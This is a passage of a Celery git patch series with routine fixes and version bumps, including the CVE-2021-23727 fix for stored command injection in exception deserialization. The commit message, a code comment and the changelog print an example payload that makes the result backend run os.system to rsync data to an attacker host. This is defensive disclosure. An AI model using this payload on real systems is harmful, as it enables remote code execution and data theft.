+:setting:`worker_max_tasks_per_child` and :setting:`worker_max_memory_per_child`
+settings.
+
+You must be careful not to set these settings too low, or else your workers
+will spend most of their time restarting child processes instead of processing
+tasks. For example, if you use a :setting:`worker_max_tasks_per_child` of 1
+and your child process takes 1 second to start, then that child process would
+only be able to process a maximum of 60 tasks per minute (assuming the task ran
+instantly). A similar issue can occur when your tasks always exceed
+:setting:`worker_max_memory_per_child`.
+
+
.. rubric:: Footnotes
.. [*] The chapter is available to read for free here:
From a5f140bce9800221e8f68b9f5493e4ba4e4bc3b4 Mon Sep 17 00:00:00 2001
From: Ori Avtalion
Date: Sat, 25 Dec 2021 12:45:01 +0200
Subject: [PATCH 168/177] Add changelog to PyPI sidebar
---
setup.py | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/setup.py b/setup.py
index 6b41a8a71a6..da60b24b2d3 100755
--- a/setup.py
+++ b/setup.py
@@ -175,7 +175,8 @@ def run_tests(self):
]
},
project_urls={
- "Documentation": "http://docs.celeryproject.org/en/latest/index.html",
+ "Documentation": "https://docs.celeryproject.org/en/latest/index.html",
+ "Changelog": "https://docs.celeryproject.org/en/stable/changelog.html",
"Code": "https://github.com/celery/celery",
"Tracker": "https://github.com/celery/celery/issues",
"Funding": "https://opencollective.com/celery"
From 527458d8d419cb41b74c5b05aaa8ddf957704f84 Mon Sep 17 00:00:00 2001
From: Paul Brown
Date: Fri, 24 Dec 2021 22:41:36 -0600
Subject: [PATCH 169/177] prevent duplication in event loop on Consumer restart
---
celery/concurrency/asynpool.py | 9 ++++++++-
t/unit/concurrency/test_prefork.py | 11 +++++++++++
2 files changed, 19 insertions(+), 1 deletion(-)
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index d5d2bdb5124..b9f2875a261 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -405,6 +405,9 @@ class AsynPool(_pool.Pool):
ResultHandler = ResultHandler
Worker = Worker
+ #: Set by :meth:`register_with_event_loop` after running the first time.
+ _registered_with_event_loop = False
+
def WorkerProcess(self, worker):
worker = super().WorkerProcess(worker)
worker.dead = False
@@ -523,7 +526,11 @@ def register_with_event_loop(self, hub):
for handler, interval in self.timers.items():
hub.call_repeatedly(interval, handler)
- hub.on_tick.add(self.on_poll_start)
+ # Add on_poll_start to the event loop only once to prevent duplication
+ # when the Consumer restarts due to a connection error.
+ if not self._registered_with_event_loop:
+ hub.on_tick.add(self.on_poll_start)
+ self._registered_with_event_loop = True
def _create_timelimit_handlers(self, hub):
"""Create handlers used to implement time limits."""
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 2e2a47353b7..241dc93a0dc 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -344,6 +344,17 @@ def _fake_hub(*args, **kwargs):
# Then: all items were removed from the managed data source
assert fd_iter == {}, "Expected all items removed from managed dict"
+ def test_register_with_event_loop__no_on_tick_dupes(self):
+ """Ensure AsynPool's register_with_event_loop only registers
+ on_poll_start in the event loop the first time it's called. This
+ prevents a leak when the Consumer is restarted.
+ """
+ pool = asynpool.AsynPool(threads=False)
+ hub = Mock(name='hub')
+ pool.register_with_event_loop(hub)
+ pool.register_with_event_loop(hub)
+ hub.on_tick.add.assert_called_once()
+
@t.skip.if_win32
class test_ResultHandler:
From 5c3f1559df16c32fb8d82918b4497f688d42ad0a Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 13:35:21 +0200
Subject: [PATCH 170/177] Fix CVE-2021-23727 (Stored Command Injection securtiy
vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
`os.system("rsync /data attacker@192.168.56.100:~/data")`
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload `rsync /data attacker@192.168.56.100:~/data` as the exception arguments like so:
```json
{
"exc_module": "os",
'exc_type': "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
```
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the tasks's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
---
celery/backends/base.py | 94 +++++++++++++++++++++++++-----------
t/unit/backends/test_base.py | 28 ++++++++++-
2 files changed, 94 insertions(+), 28 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index ffbd1d0307c..094cbf86921 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -25,7 +25,8 @@
from celery.app.task import Context
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
ChordError, ImproperlyConfigured,
- NotRegistered, TaskRevokedError, TimeoutError)
+ NotRegistered, SecurityError, TaskRevokedError,
+ TimeoutError)
from celery.result import (GroupResult, ResultBase, ResultSet,
allow_join_result, result_from_tuple)
from celery.utils.collections import BufferMap
@@ -338,34 +339,73 @@ def prepare_exception(self, exc, serializer=None):
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
- if exc:
- if not isinstance(exc, BaseException):
- exc_module = exc.get('exc_module')
- if exc_module is None:
- cls = create_exception_cls(
- from_utf8(exc['exc_type']), __name__)
- else:
- exc_module = from_utf8(exc_module)
- exc_type = from_utf8(exc['exc_type'])
- try:
- # Load module and find exception class in that
- cls = sys.modules[exc_module]
- # The type can contain qualified name with parent classes
- for name in exc_type.split('.'):
- cls = getattr(cls, name)
- except (KeyError, AttributeError):
- cls = create_exception_cls(exc_type,
- celery.exceptions.__name__)
- exc_msg = exc['exc_message']
- try:
- if isinstance(exc_msg, (tuple, list)):
- exc = cls(*exc_msg)
- else:
- exc = cls(exc_msg)
- except Exception as err: # noqa
- exc = Exception(f'{cls}({exc_msg})')
+ if not exc:
+ return None
+ elif isinstance(exc, BaseException):
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
+ return exc
+ elif not isinstance(exc, dict):
+ try:
+ exc = dict(exc)
+ except TypeError as e:
+ raise TypeError(f"If the stored exception isn't an "
+ f"instance of "
+ f"BaseException, it must be a dictionary.\n"
+ f"Instead got: {exc}") from e
+
+ exc_module = exc.get('exc_module')
+ try:
+ exc_type = exc['exc_type']
+ except KeyError as e:
+ raise ValueError("Exception information must include"
+ "the exception type") from e
+ if exc_module is None:
+ cls = create_exception_cls(
+ exc_type, __name__)
+ else:
+ try:
+ # Load module and find exception class in that
+ cls = sys.modules[exc_module]
+ # The type can contain qualified name with parent classes
+ for name in exc_type.split('.'):
+ cls = getattr(cls, name)
+ except (KeyError, AttributeError):
+ cls = create_exception_cls(exc_type,
+ celery.exceptions.__name__)
+ exc_msg = exc.get('exc_message', '')
+
+ # If the recreated exception type isn't indeed an exception,
+ # this is a security issue. Without the condition below, an attacker
+ # could exploit a stored command vulnerability to execute arbitrary
+ # python code such as:
+ # os.system("rsync /data attacker@192.168.56.100:~/data")
+ # The attacker sets the task's result to a failure in the result
+ # backend with the os as the module, the system function as the
+ # exception type and the payload
+ # rsync /data attacker@192.168.56.100:~/data
+ # as the exception arguments like so:
+ # {
+ # "exc_module": "os",
+ # "exc_type": "system",
+ # "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ # }
+ if not isinstance(cls, type) or not issubclass(cls, BaseException):
+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
+ raise SecurityError(
+ f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
+
+ # XXX: Without verifying `cls` is actually an exception class,
+ # an attacker could execute arbitrary python code.
+ # cls could be anything, even eval().
+ try:
+ if isinstance(exc_msg, (tuple, list)):
+ exc = cls(*exc_msg)
+ else:
+ exc = cls(exc_msg)
+ except Exception as err: # noqa
+ exc = Exception(f'{cls}({exc_msg})')
+
return exc
def prepare_value(self, result):
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 3436053871d..203cbfdd534 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -1,3 +1,4 @@
+import re
from contextlib import contextmanager
from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
@@ -11,7 +12,7 @@
from celery.backends.base import (BaseBackend, DisabledBackend,
KeyValueStoreBackend, _nulldict)
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
- ChordError, TimeoutError)
+ ChordError, SecurityError, TimeoutError)
from celery.result import result_from_tuple
from celery.utils import serialization
from celery.utils.functional import pass1
@@ -581,6 +582,31 @@ def test_exception_to_python_when_None(self):
b = BaseBackend(app=self.app)
assert b.exception_to_python(None) is None
+ def test_not_an_actual_exc_info(self):
+ pass
+
+ def test_not_an_exception_but_a_callable(self):
+ x = {
+ 'exc_message': ('echo 1',),
+ 'exc_type': 'system',
+ 'exc_module': 'os'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+ self.b.exception_to_python(x)
+
+ def test_not_an_exception_but_another_object(self):
+ x = {
+ 'exc_message': (),
+ 'exc_type': 'object',
+ 'exc_module': 'builtins'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+ self.b.exception_to_python(x)
+
def test_exception_to_python_when_attribute_exception(self):
b = BaseBackend(app=self.app)
test_exception = {'exc_type': 'AttributeDoesNotExist',
From 7384b14a6fe57b3dbcddea20714c91196df1bd03 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 16:12:41 +0200
Subject: [PATCH 171/177] Fix changelog formatting.
---
Changelog.rst | 18 ++++++++++++------
1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/Changelog.rst b/Changelog.rst
index 84d02ba3ae2..0d138c98bd6 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -12,14 +12,15 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.1:
5.2.1
-=======
+=====
+
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
-- Limit redis version: <4.0.0.
+- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
@@ -31,20 +32,22 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.0:
5.2.0
-=======
+=====
+
:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin
- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
-- Limit pymongo version: <3.12.1 (#7041)
+- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1
.. _version-5.2.0rc2:
5.2.0rc2
-=======
+========
+
:release-date: 2021-11-02 1.54 P.M UTC+3:00
:release-by: Naomi Elstein
@@ -72,7 +75,7 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.0rc1:
5.2.0rc1
-=======
+========
:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz
@@ -99,6 +102,7 @@ an overview of what's new in Celery 5.2.
5.2.0b3
=======
+
:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz
@@ -126,6 +130,7 @@ an overview of what's new in Celery 5.2.
5.2.0b2
=======
+
:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
@@ -140,6 +145,7 @@ an overview of what's new in Celery 5.2.
5.2.0b1
=======
+
:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
From 815e652284c5ccf3904e081ee958efc5da095687 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 16:27:26 +0200
Subject: [PATCH 172/177] Add changelog for 5.2.2.
---
Changelog.rst | 38 ++++++++++++++++++++++++++++++++++++++
1 file changed, 38 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index 0d138c98bd6..c5cfddf4075 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,44 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.2:
+
+5.2.2
+=====
+
+:release-date: 2021-12-26 16:30 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Various documentation fixes.
+- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
+
+ When a task fails, the failure information is serialized in the backend.
+ In some cases, the exception class is only importable from the
+ consumer's code base. In this case, we reconstruct the exception class
+ so that we can re-raise the error on the process which queried the
+ task's result. This was introduced in #4836.
+ If the recreated exception type isn't an exception, this is a security issue.
+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
+ ``os.system("rsync /data attacker@192.168.56.100:~/data")``
+ by setting the task's result to a failure in the result backend with the os,
+ the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
+
+ .. code-block:: python
+
+ {
+ "exc_module": "os",
+ 'exc_type': "system",
+ "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ }
+
+ According to my analysis, this vulnerability can only be exploited if
+ the producer delayed a task which runs long enough for the
+ attacker to change the result mid-flight, and the producer has
+ polled for the task's result.
+ The attacker would also have to gain access to the result backend.
+ The severity of this security vulnerability is low, but we still
+ recommend upgrading.
+
.. _version-5.2.1:
From d497b3e39b099f016f784153a16b75ea4d653267 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 27 Dec 2021 16:44:22 +0000
Subject: [PATCH 173/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pre-commit/pre-commit-hooks: v4.0.1 → v4.1.0](https://github.com/pre-commit/pre-commit-hooks/compare/v4.0.1...v4.1.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 8e2429511ac..43bde9e08b5 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -16,7 +16,7 @@ repos:
- id: yesqa
- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v4.0.1
+ rev: v4.1.0
hooks:
- id: check-merge-conflict
- id: check-toml
From c79d5c79c1c212b1f7e5036b7dca18568eae68de Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 28 Dec 2021 09:45:37 +0600
Subject: [PATCH 174/177] try to make linters happy (#7193)
---
celery/backends/base.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 094cbf86921..86286ca9df5 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -16,7 +16,7 @@
from billiard.einfo import ExceptionInfo
from kombu.serialization import dumps, loads, prepare_accept_content
from kombu.serialization import registry as serializer_registry
-from kombu.utils.encoding import bytes_to_str, ensure_bytes, from_utf8
+from kombu.utils.encoding import bytes_to_str, ensure_bytes
from kombu.utils.url import maybe_sanitize_url
import celery.exceptions
From d4b97bedc79aed0b45dd3720b683d8d8572da2a9 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:23:04 +0600
Subject: [PATCH 175/177] try newer bumped versions (#7194)
---
requirements/default.txt | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index 3be20593c97..509a43d9e5e 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,9 +1,9 @@
-pytz>0.dev.0
+pytz>=2021.3
billiard>=3.6.4.0,<4.0
-kombu>=5.2.2,<6.0
+kombu>=5.2.3,<6.0
vine>=5.0.0,<6.0
-click>=8.0,<9.0
+click>=8.0.3,<9.0
click-didyoumean>=0.0.3
click-repl>=0.2.0
click-plugins>=1.1.1
-setuptools
+setuptools>=59.1.1,<59.7.0
From 9532c73badd627457d4e543ba85fbfb9f6720de2 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:35:30 +0600
Subject: [PATCH 176/177] Changelog for v5.2.3
---
Changelog.rst | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index c5cfddf4075..daf7b52e019 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,25 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.3:
+
+5.2.3
+=====
+
+:release-date: 2021-12-29 12:00 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Allow redis >= 4.0.2.
+- Upgrade minimum required pymongo version to 3.11.1.
+- tested pypy3.8 beta (#6998).
+- Split Signature.__or__ into subclasses' __or__ (#7135).
+- Prevent duplication in event loop on Consumer restart.
+- Restrict setuptools>=59.1.1,<59.7.0.
+- Kombu bumped to v5.2.3
+- py-amqp bumped to v5.0.9
+- Some docs & CI improvements.
+
+
.. _version-5.2.2:
5.2.2
From 56275f5c85247435c14d84807ad254b0f33913c8 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:49:42 +0600
Subject: [PATCH 177/177] =?UTF-8?q?Bump=20version:=205.2.2=20=E2=86=92=205?=
=?UTF-8?q?.2.3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 4 ++--
4 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index ad96c6ecbea..1a7dbf3b05d 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.1
+current_version = 5.2.3
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 03bbec6f613..d82ab9995ae 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.1 (dawn-chorus)
+:Version: 5.2.3 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 320228e92ca..df1fe1a6c05 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.1'
+__version__ = '5.2.3'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 50292b1d7aa..0e97f80ffa0 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,5 +1,5 @@
-:Version: 5.2.1 (cliffs)
-:Web: http://celeryproject.org/
+:Version: 5.2.3 (dawn-chorus)
+:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
:Keywords: task, queue, job, async, rabbitmq, amqp, redis,